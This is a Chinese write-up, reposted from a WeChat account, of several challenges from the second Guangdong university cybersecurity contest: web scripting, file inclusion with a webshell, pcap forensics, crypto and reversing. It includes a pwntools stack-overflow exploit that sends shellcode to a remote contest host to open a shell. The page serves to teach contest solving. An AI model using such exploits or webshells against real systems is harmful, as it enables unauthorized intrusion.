第二届广东大学生网络安全攻防大赛部分WP

admin 2025年2月15日09:13:36评论3 views字数 2076阅读6分55秒阅读模式

签到题

直接上公众号发送我来签到了

easy_ctf

  1. import requests
  2. import re
  3.  
  4. while True:
  5.    session = requests.Session()
  6.    ans = ""
  7.    url = 'http://120.79.191.238:42958/'
  8.    content = session.get(url).text
  9.    res = re.findall('<td style="WORD-WRAP: break-word" width="1600">(.*)<td>', content, re.S)
  10.    text = res[0].replace('r', '').replace('n', '')
  11.    lst = {}
  12.    for i in text:
  13.        if i not in lst:
  14.            lst[i] = 1
  15.        else:
  16.            lst[i] += 1
  17.  
  18.    lst = sorted(lst.items(), key=lambda x: x[1])
  19.    for i in lst:
  20.        ans += i[0]
  21.  
  22.    result = session.post(url, data={
  23.        'ans': ans
  24.   }).text
  25.  
  26.    if "flag" in result:
  27.        print(result)
  28.        print(ans)
  29.        break

根据题目的意思编写代码,循环提交,当返回结果出现flag后停止程序

in

第二届广东大学生网络安全攻防大赛部分WP

文件包含

第二届广东大学生网络安全攻防大赛部分WP

挂马

第二届广东大学生网络安全攻防大赛部分WP

蚁剑连接

复合

使用wireshark打开文件,查看数据后,尝试导出http数据

查看text.html有flag,尝试之后并不是正确flag

查看各个文件,发现pass.md是个缺少文件头的压缩包,补全文件头,修改扩展名

第二届广东大学生网络安全攻防大赛部分WP

第二届广东大学生网络安全攻防大赛部分WP

压缩包中文件的内容,根据特征发现是quoted-printable编码

http://web.chacuo.net/charsetquotedprintable

第二届广东大学生网络安全攻防大赛部分WP

像一段文本但是不是正确的单词,猜测凯撒密码一类,尝试维吉尼亚密码破解

第二届广东大学生网络安全攻防大赛部分WP

根据文章意思提取flag{life_is_fantastic }

jmp_rsp

  1. from pwn import *
  2. context(log_level = 'debug', arch = 'amd64', os = 'linux')
  3.  
  4. shellcode = asm(shellcraft.sh())
  5.  
  6. p=remote("47.106.122.102",41377)
  7.  
  8. jmp_rsp=0x46d01d# use this to jmp rsp
  9. payload='0'*136+p64(jmp_rsp)+shellcode
  10. p.sendline(payload)
  11. pause()
  12. p.interactive()

第二届广东大学生网络安全攻防大赛部分WP

第二届广东大学生网络安全攻防大赛部分WP

crypto-xor2

  1. def decode():
  2. with open("./cipher", "r") as f:
  3. ss = f.read()
  4. key = "xxxx"
  5. flag=""
  6. for i, c in enumerate(ss):
  7. flag += chr(ord(c) ^ ord(key[i%4]))
  8. print(flag)
  9.  
  10. decode()

pyre

  1. def get_list():
  2.    shuzus = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53,
  3.              12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
  4.    shuzi = 179
  5.    str = ""
  6.    for shuzu in range(len(shuzus)):
  7.        for i in range(0, 128):
  8.            print(i)
  9.            if i * 33 % shuzi != shuzus[shuzu]:
  10.                continue
  11.            else:
  12.                str += chr(i)
  13.                print(str)
  14.                break
  15.  
  16.  
  17. def test_flag():
  18.    flag = input('请输入flag:')
  19.    shuzus = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53,
  20.              12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
  21.    if len(flag) != 42:
  22.        print('长度有错')
  23.        return 0
  24.    shuzi = 179
  25.    for i in range(len(flag)):
  26.        if ord(flag[i]) * 33 % shuzi != shuzus[i]:
  27.            print('未拿到')
  28.            return
  29.    print('拿到了flag')
  30.  
  31.  
  32. test_flag()
  33. get_list()

接下来抽奖送可达鸭,可以在双手贴上白纸,写上自己喜欢的文字

 

 

 

原文始发于微信公众号(bgbing安全):第二届广东大学生网络安全攻防大赛部分WP(抽奖送可达鸭)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月15日09:13:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   第二届广东大学生网络安全攻防大赛部分WPhttps://cn-sec.com/archives/1054740.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息